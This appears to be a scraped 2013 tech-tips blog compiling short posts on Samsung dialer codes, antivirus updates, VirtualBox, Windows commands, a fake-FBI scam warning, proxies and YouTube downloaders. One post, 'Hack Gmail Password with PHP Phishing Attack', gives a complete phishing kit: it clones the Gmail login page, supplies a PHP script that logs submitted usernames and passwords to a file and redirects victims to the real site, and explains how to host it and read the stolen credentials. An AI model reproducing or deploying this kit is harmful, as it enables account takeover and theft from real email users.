Thursday, 7 March 2013

Samsung Galaxy Y Android Secret Codes


SAMSUNG GALAXY Y ANDROID CODE
*#*#4636#*#* phone information
*2767*3855# hard reset
*#*#7780#*#* factory reset
*#*#7594#*#* change end call/power option
*#*#197328640#*#* service mode
*#*#273283*255*663282*#*#* file copy screen (backup media files)
*#*#526#*#* wlan test
*#*#232338#*#* shows wifi mac address
*#*#1472365#*#* gps test
*#*#1575#*#* another gps test
*#*#232331#*#* bluetooth test
*#*#232337#*# shows bluetooth device address
*#*#8255#*#* gtalk service monitor
*#*#0283#*#* packet loopback
*#*#0*#*#* lcd test
*#*#0673#*#* melody test
*#*#0842#*#* device test (vibration test and backlight test)
*#*#2663#*#* touch screen version
*#*#2664#*#* touch screen test
*#*#0588#*#* proximity sensor test
*#*#3264#*#* ram version
codes to get firmware version information:
*#*#4986*2650468#*#* pda, phone, h/w, rfcalldate
*#*#1234#*#* pda and phone
*#*#1111#*#* fta sw version
*#*#2222#*#* fta hw version
*#*#44336#*#* pda, phone, csc, build time, change list number

Why Virus Definition Updates are Important?|Why should we update the virus definitions


Like any “cat and mouse” situation, the smarter the antivirus software gets, the smarter the makers of the viruses try to be. Whether for the intellectual challenge of it or for other reasons, new viruses are continually being developed and sent around the Internet literally, every day, and many of these viruses are specifically designed to defeat the major antivirus software packages. 
The antivirus software, no matter how good, can only look for what it “knows” to look for and new viruses come out all the time. As new viruses do come out, the software uses “definitions” that allow it to recognize and deal with them.
Avast antivirus updating process
Typically definitions will get updated a couple of times per week, which should keep your software up to date and keep your computer virus-free.
You should set your antivirus software to do a full system scan on a regular basis, maybe once per week, as well as enabling the various “automatic” scans of items like email.
You may experience a slight speed lag from time to time as the scans run, but this is a small price to pay for keeping your machine safe.
Finally, every once in a while there may be a virus that moves across the Web so fast that the major antivirus programs will all miss it. In almost every situation like this, the companies will develop a specific software tool that you can download for free, that will allow you to remove the “one that got away.”

Install Ubuntu on Windows System | Use both Ubuntu and Windows Simultaneously | Ubuntu Installation Guide on Windows


Want to see Ubuntu on windows system? Yes! I hoped the same till I don’t know this technique.
1. First download VirtualBox at http://www.virtualbox.org/wiki/Downloads 2. Install it.
3. Open it up and click New on the top.

image
4. Hit Next.

image
5. Name it and choose Ubuntu from the drop-down list.

image
6. Choose the amount of RAM you would like to dedicate to running Linux. Choose about ¼ to ½ of your total RAM. I have 2 gigs of RAM, so I chose 512 MB.

image
7. Hit Next.

image
8. Here we choose whether we would like to create a dynamic or fixed hard disk image. If you have lots of space on your hard disk, I would go with a dynamic image so if you choose to download lots of programs it won’t be a problem. If you have limited drive space, you should go with a fixed-size image so that you don’t have to worry about going over too much.

image
9. Choose the amount of gigabytes you would like to dedicate to running Linux. I would go with 2 GB at the least.

image
10. Simply hit Finish.

image
11. It automatically selects the image you just created. Hit Next.

image
12. You’re almost done! Hit Finish.

image
13. You are now back at the main page. Here you will click CD/DVD-ROM.

image
14. Check Mount CD/DVD Drive and choose ISO Image File.

image
15. If you downloaded the Ubuntu image file in the beginning, locate it and select it. If you haven’t downloaded it yet, go to the beginning of this chapter where I have a step-by-step guide.

image
16. Hit Select.

image
17. You will come back to where you started. Hit OK.

image
18. You will now see the main screen again. Click on START in the top left corner.

image
19. You will see Ubuntu boot up in a small pop-up screen. Choose the option “Try Ubuntu”. If you see a list of countries instead of the list shown below, select yours and hit <ENTER>. Make sure you are working in the Virtual Environment by clicking into the Ubuntu window.

image

Do You Need To Upgrade Your PC? Check this out!


One of the most frequently asked questions is “Do I need to upgrade my PC?”. The following is a checklist which should enable you to answer that question yourself:

How long have you had your PC?

If you’ve been using your PC for over a year, you should start to notice the computer getting slower.
You’ll notice the slowness when you start up your PC, opening the browser and when you use applications from the office suite.
Every time we use our PCs, we store temporary files and make edits to the system which in time, will slow down our PCs. After a year or so, your whole PC seems to be a lot slower than when you first bought it.
So before you start thinking about an upgrade or getting a new PC, save all the data on your PC and reinstall the whole computer operating system. If it is still slow after installing all the programs you need, then make the decision to buy a new computer or add more RAM.

Have you checked for viruses?

Sometimes, your PC may be slow because it is infected by a virus. You need to scan your computer with your antivirus software to see there are any malicious viruses. Removing these viruses will normally improve the speed.
You also need to check if your virus software is running. A lot of the times the PC is slow because your computer is scanning for viruses and it does so by going to each file and folder on your hard disk.
If this is the case, set your antivirus‟ scheduled scan to a time when you won‟t be using the computer, but when you will leave it on. For example lunch time.

Did problems occur after installing new software?

If you noticed that your PC started to slow down after installing a new application then it maybe because the application is affecting your computer.
Immediately uninstall the application and see if it improves things. Then take a good look at the application‟s recommended hardware requirements to see if it matches your computer‟s hardware.

Do you want to upgrade your Operating System?

If there is a new operating system and you would like to upgrade to it, check out the hardware requirements and see if it matches with your computer.
For example, when Windows Vista was launched in the year 2007, a lot of PCs couldn't‟t upgrade because it required 1GB of RAM at least. However, a lot of people noticed that to really run Windows Vista, you needed at least 2GB of RAM for a smooth operation.
In this case, you will need to check to see if your motherboard can support more RAM. Read the documentation for your motherboard and see how much RAM it can support.

Is your hard disk full?

If you have used up a lot of space on your hard disk, you need to remove some unneeded applications and data such as your photos and videos you have downloaded.
After you have freed up your hard disk space, run the utility Disk Defragmenter.
If you are using Windows XP, this application is at Accessories…System Tools…Disk Defragmenter. This will reorganize the space on your hard disk so that it will process data quicker.
You should have at least 3GB of free hard disk space on your C drive to run your programs smoothly.

Are any components replaceable?

If you need a better webcam, CD/DVD writer, card reader, sound card etc.… then the majority of the times you will only need to upgrade that particular accessory.
The only time you would need to replace your PC is when you need to replace your motherboard because the accessories you want to upgrade isn’t supported by the motherboard.
For example:

- you want more RAM but your motherboard will only support an old type of RAM.

- you want a new hard disk but it‟s not support by your old Motherboard.

- a new type of USB port or device is launched and it requires a new type of motherboard.
The rule of thumb is to compare the cost of upgrading your PC to the cost of buying a new PC. If the prices are relatively the same then buy a new PC to save time.

Have you created a folder named CON???


Guys, Have you ever tried creating a folder named 'CON' or 'AUX' or 'NUL' ?

Just try it now.

Tried???

Not working...

Don't worry, I have brought a simplest trick for you.

Step1: Create a new folder or rename the already existing folder from the Right-click option.


Step2: Now press alt and press 255.

Generally, press 255 from the Right Hand side of your keyboard (NumPads) where only numbers are given.

Step3: Now you can write 'con' or 'aux' or 'nul' as a folder name and press Enter.

You can see the folder created with the name you typed.


You can create several such folders and delete it easily.
Your comments are welcome. :)

General Advice on the use and care of USB Memory Sticks


Whilst the use of a Memory Stick is far more reliable than a floppy disk, like most aspects of computing there are certain things you need to be aware of:
1. Avoid contact with extremes of temperature, magnetic fields and liquids
2. Label your memory stick with your contact information
3. Remember to take it with you when you leave
4. Use memory sticks as a method of transportation only, do not rely on this as your only method of storage and backup.  Information Services recommend the use of your networked H drive for important data.   
Don’t forget: memory sticks are relatively cheap, your data may not be!
5. Confidentiality – Data on a lost memory stick can easily be read by others.
6. Corruption of the data can occur if the device is not removed correctly and may render the device unusable in the future.
7. Some USB sticks have a small write-protection switch on one side. If you are having problems saving, check this switch and try again.
8. Do not use encryption software that needs to be installed on the PC (if you have used your memory stick at home and have problems using it on a Cardiff University workstation, this may be the cause).
9. Do not partition the memory stick, doing so may cause you to lose your network connection.
10. Electronic material is protected by copyright in the same way as any other literary, dramatic, musical or artistic work.  Therefore it is an infringement of copyright to download or copy from a CD, database, electronic journal or web site without the permission of the copyright holder.   

The Computer Network Terminology you should be known


Autonomous Systems (AS)
A collection of routers under a single administrative authority, using a common Interior Gateway Protocol for routing packets.
Border Gate Protocol (BGP)
A protocol that distributes routing information to the routers,  which connect autonomous systems.
Domain name
A series of alphanumeric strings separated by periods that is used to name  organizations and computers and addresses on the Internet.
Domain Name System (DNS)
A general-purpose distributed, replicated, data query service  chiefly used on Internet for translating hostnames into Internet addresses.
Firewall
A router or computer software that prevents unauthorized access to private data (as on a  company's local area network or intranet) by outside computer users (as of the Internet).

This might help you: How to Use The Most of Your Laptop Battery Using Windows 7

Hypertext Transfer Protocol (HTTP)
A protocol used to request and transmit files, especially  webpages and webpage components, over the Internet or other computer network.
Internet Control Message Protocol (ICMP)
One of the Internet protocols that allows for the  generation of error messages, test packets, and informational messages related to IP.
Internet Protocol (IP)
A connectionless, best-effort packet switching protocol that provides  packet routing, fragmentation and re assembly through the data link layer.
Internet Service Provider (ISP)
A company that provides other companies or individuals with  access to, or presence on, the Internet.
Listening post
A center for monitoring electronic communications (as of an enemy).
Plaintext
The unencrypted form of an encrypted message.
Private network
A network composed of point-to-point leased lines between sites.
Router
A device that forwards packets between networks based on network layer information and routing tables, which often constructed by routing protocols.
Routing Information Protocol (RIP)
A distance vector routing protocol that distributes routing information to the routers within an autonomous system.
 
Transmission Control Protocol (TCP)
A protocol for the internet to get data from one network device to another by using a retransmission strategy to insure that data will not be lost in transmission.
Uniform Resource Locator (URL)
A way of specifying the location of an object, typically a web page, on the Internet. It has two parts separated by a colon. The part before the first colon specifies the protocol. The part after the colon is the pathname of a file on the server.
User Datagram Protocol (UDP)
A connectionless protocol in the transport layer layered on top of IP protocol that provides simple but unreliable datagram services.
Virtual Private Network (VPN)
A network composed of several sub private networks connected through a public network (as of the Internet). The network traffic is encrypted in the IP layer so that secure connections among the sub private networks are provided through the insecure public network.

Most Common Internal Commands for the Command Shell You Yet Don’t Know


You can execute two types of commands from within the command shell.The first type is an internal command—these commands are built in the command shell itself and do not appear as executable files anywhere in the system. Most of these commands are very similar to MS-DOS commands. Examples of internal commands are Dir for generating a directory listing, Cls for clearing the screen, and Del for deleting a specific file.

Internal Command for command shell

The second type of command you can execute from within the command shell is an external command. External commands are separate executable files located in the %SystemRoot\System32 folder. Although these are called external, they still run from within the command shell. Examples of external commands are XCOPY.exe for copying the entire directory tree, DISKPART.exe for managing disk partitions, and IPCONFIG.exe for displaying the computer’s Transmission Control Protocol/Internet Protocol (TCP/IP) configuration.  External commands are more versatile and offer more advanced capabilities than internal commands. Here are list some of the more common internal commands:

Assoc Displays or modifies the current filename extension associations. When ou use this command without any parameters, it displays a list of all filename xtension associations. For example, if you type assoc .doc at the command rompt, the extension association will be displayed as .doc=Word.Document.8.

Call Used to call another batch program file or a procedure from within a batch ile. Control of the currently running batch file is then transferred to the called atch file.This command accepts labels as arguments. It has no effect if you use it outside a batch file.

CD (ChDir) Displays the name of the current working directory or changes the current working directory. If you use it without any parameters, the current working directory is displayed. For example, to change the working directory to C:\Adminfiles\ Support, assuming your current working drive is C:, type cd \adminfiles\ support at the command prompt.

Color Changes the foreground and background colors for the current session of the command shell.This command has the same effect as using the cmd /t:FB command discussed earlier.The parameters F and B are values of the colors, For example, the command color 17 will change the foreground color to blue and the background color to white.

Cls Clears the screen of the current command shell and erases the screen buffer, resulting in a blank command prompt window.
Copy Copies the specified file from one location to another. If the source and destination locations are the same, an error is returned that says File cannot be copied on to itself.”

Date Displays or changes the current date on the computer.

Dir Displays the contents of the current working directory, including names of the subdirectories.You can specify a different directory and use wildcards to limit the results.This command also displays the total number of files and subdirectories, their size, total space used, and space remaining on the drive.

Del (Erase) Deletes the specified file, multiple files, or all files within a given directory. For example, the command Del C:\Reports will delete all files in the C:\Reports folder.You can use wildcards to specify certain types of files to delete; for example, Del C:\Reports\*.doc will delete all files with a .doc extension in the C:\Reports folder.

Echo Displays text strings used with the command line and sets the echo on or off.This command is similar to using the command Cmd.exe /e:on | off. You can also use this command to display a message.

Endlocal Ends localization of the environment variables in a batch file and  restores them to their values before the Setlocal command.This command works only in batch files and has no effect if you use it separately at the command prompt.

Exit Used to exit from the command shell window.

For Used to run a specified command for each file in a set of files.You can use it within a batch file or directly from the command prompt.

■ Ftype Displays current file types or modifies the file types used in filename extension associations. If you use it without any parameters, it displays the file types that have open command strings defined.The open command string specifies the open command used to open the file type.

Goto Used to direct the command interpreter to jump to a command specified with the label.You use it in batch files to direct the processing from the command identified by the label.

If Used in batch files to perform conditional processing of commands. If the condition is satisfied, the command following the If command is processed. Otherwise, the interpreter processes the command that follows the Else command.

■Md (Mkdir) Creates a directory or a subdirectory. For example, Md C:\Reports\MyFiles or Mkdir C:\Reports\MyFiles will create a Myfiles subdirectory within the Reports directory on the C: drive.

Move Moves one or more files from one directory to another.The source and target locations of the files are specified in the command. If the source is not specified, files are moved from the current working directory.

Path Displays or changes the command path for searching the executable files. When you use this without any parameters, it displays the current command path the operating system uses to search for executables.

Pause Suspends the processing of a batch file and prompts the user to press any key to continue processing. Using pause in a batch file is different from using the Ctrl + C key combination.This key combination stops the batch program from processing and asks the user whether she wants to terminate the procedure.

PopD Changes the directory stored by the PushD command as the current working directory in a batch file.The PushD command creates a virtual directory, and repeated use of the PushD command creates a stack of multiple directories. The PopD command changes the current directory to the one most recently stored by PushD.

Prompt Sets the display text for the command prompt.You use it to customize the command prompt to display any text, such as the current date and time.To reset the prompt to its default, use the Prompt command without any parameters.
PushD Stores the name of the current directory for use by PopD before changing to another specified directory.The directories are stored in a stack with the last directory on top.

Rd (Rmdir) Removes or deletes the directory or directories and subdirectories specified in the command.This command cannot delete a directory that has hidden or system files.You must empty the directory before using this command, and you cannot delete the current working directory.You must first use the Cd command to change the current directory.

Rem Used to insert comments or remarks in a batch file.The text after the Rem command is not processed.

Set Displays, sets, or removes the environment variables. When you use this command without any parameters, it displays the current environment variables.The environment variables are used to control the behavior of batch files.You would commonly use this command in the Autoexec.nt file.

Setlocal Starts localization of environment variables in a batch file.The localization ends when the command interpreter encounters the Endlocal command.This command is effective only in batch files.

■ Shift Changes the position of a replaceable parameter in a batch file.

■ Start Opens a second command prompt window to run a specified program or an executable. If no program or command is specified, the command just opens another command prompt window.

■ Time Displays or changes the current time on the computer.

■ Title Used to change the title of the command prompt window during the processing of a batch file.You can reset the title to its default by using the Title command again.

■ Type Displays the contents of a text file.This command does not modify the text file.

■ Vol Displays the volume number and serial number of a disk.

Beware of this F.B.I. Spam mail || Don’t Make Yourself a Prey to this scam


I got an email this afternoon trying to snatch my information via a reply. Before you respond to this email remember,
1. FBI never try to get down to earth for a guy like your or me
2. FBI doesn’t need any funds from individual people.
Thanks to Gmail for recognizing this before I could open this. So I WARN YOU DON’T RESPOND to this one if you got it.
This is the mail I got. Let’s take a look!

ANTI-TERRORIST AND MONETARY CRIMES DIVISION
FBI HEADQUARTERS WASHINGTON DC
FEDERAL BUREAU OF INVESTIGATIONS J.EDGAR HOOVER BUILDING
935 PENNSYLVANIA AVENUE, NW WASHINGTON, D.C. 20535-0001
Ref: FBI/DC/25/113/13/2012
Your attention is needed immediately
  We have been informed through our global intelligence monitoring network that the sum of $10.500, 000.00, has been released from a bank in Africa bearing your name as the beneficiary without dist certificate to clear your name and fund from every terrorist or drug or money laundering activities
We sincerely apologize for sending you this sensitive information via e-mail instead of a certified mail, phone call or a  face-to-face conversation,We will also send you a certified email later it is due to the urgency and importance of the security information needed. To checkmate financial recklessness, illegal gambling, racketeering and considering the effect of the global financial crisis rocking the United States, our government with the help of the Federal Bureau of Investigation (F.B.I) Washington, DC and the internet crime complaint center (ic3),alongside the CIA  signed an agreement with U.K  police for an immediate release of all overdue funds presently logged in their treasury and to ensure it is disbursed to the rightful beneficiaries in all parts of the world. If you the beneficiary would adhere to our instruction it will help you receive your payment  immediately

How To Remove Recycle bin From Your Desktop


Excited on hearing the removal of recycle bin from your desktop? You should be, because the trick I’m going to tell you need a little advanced knowledge of the computers. If you think you can dare to try yourself being a novice, I appreciate your learning spirit. Just follow as I told.
Warning: Backup your registry before you do this trick.
Instructions:
1. Click the start button and open Run.
2. Then type ‘regedit’ and click Enter.
3. Go to the HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > Current Version, then Explorer > Desktop.
4. Find the Following Key: 645FF040-5081-101B-9F08-00AA002F954E
5. Delete that key and close the registry editor. Now refresh your desktop. Your icon for the recycling bin should disappear.
Now you have done something geeky! That’s amazing!
Subscribe to us for more such tricks!

Hack Gmail Password with PHP Phishing Attack


Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming.
Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.
image
image
3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.

<?php // This marks the beginning of the PHP script.
Header(“Location: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.



So far you should see the following in your folder:


image


5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.


6. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.


image


7. This will highlight the first occurrence of the word “action” in the script and you should see the following:


image


There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:


image


Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.


8. Save and close the file.


9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.


10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.


11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.


12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:




image


13. Say after me let’s hacking begin!

Friday, 1 March 2013

HOW TO CHECK DND(Do Not Disturb) SERVICE STATUS ONLINE IN INDIA



DND is short for Do Not Disturb. This service enables the mobile users to stop receiving advertising or bulk sms or calls on their mobile. This service is provided by NDNC (National Do Not Call Registry). So if you want to check your number is registered on DND or not then here are some steps , just follow them.

STEP 1.
First of all open this website, and click on Check Registration Status.


COLLECTION OF PROXY SITES FOR BROWSING BANNED SITES

Hey friends, hi to all of you. As there are many websites that are blocked in your school/college or even in your country. If you want to open those websites, you will
need to use a proxy website. A proxy is something that hides your real information and tells the server that you are allowed to view website. Here goes the list:

Hey friends, hi to all of you. As there are many websites that are blocked in your school/college or even in your country. If you want to open those websites, you will
need to use a proxy website. A proxy is something that hides your real information and tells the server that you are allowed to view website. Here goes the list:

Rest sites are given below:
How to use? Just enter the URL you want to open and hit Enter. It will open up the sites you want.
HAVE A TRICKY DAY!!!

Top 10 websites to download YouTube videos

Hi friends , you know that YouTube do not allow the users to download videos from it. But when user like the video and want to download it on its device then he try to find some softwares or websites to download YouTube videos so today I decided to help those users to download YouTube videos. I have made a simple collection of Top 10 websites to download YouTube videos, So have a look at them , I hope this list will be useful for you and you'll like this.



1. Keep-Tube.Com


2. Savevid.com


3. Savemedia.com


4. Keepvid.com


5. Videodownloadx.com










6. Catchvideo.net


7. Savetube.com


8. Linkyoutube.com


9. Youtubeinmp4.com


10. Clipconverter.cc




[NOTE:- You can use these website to download YouTube videos only from PC browser, because Mobile browsers like OperaMini , UC web do not have Java inbuilt so you can not download YouTube video from mobile using these websites]

" ENJOY & WAIT FOR NEXT "

HOW TO POST TWITTER UPDATE AUTOMATICALLY ON FACEBOOK

Hey friends, hi to all of you. Facebook is the first thing you think when it comes to social networking. But, lots of people use Twitter too. We have a idea : Why not post your twitter updates
directly on your Facebook wall? That`s cool ! Right....Here`s how you can do it:

  • Login to your Twitter account. 
  • Now, scroll down and click Connect to Facebook
  • A pop up will come up, login with your Facebook and click on Allow
  • It is done. Now, whenever you post from twitter, it is posted to Facebook too.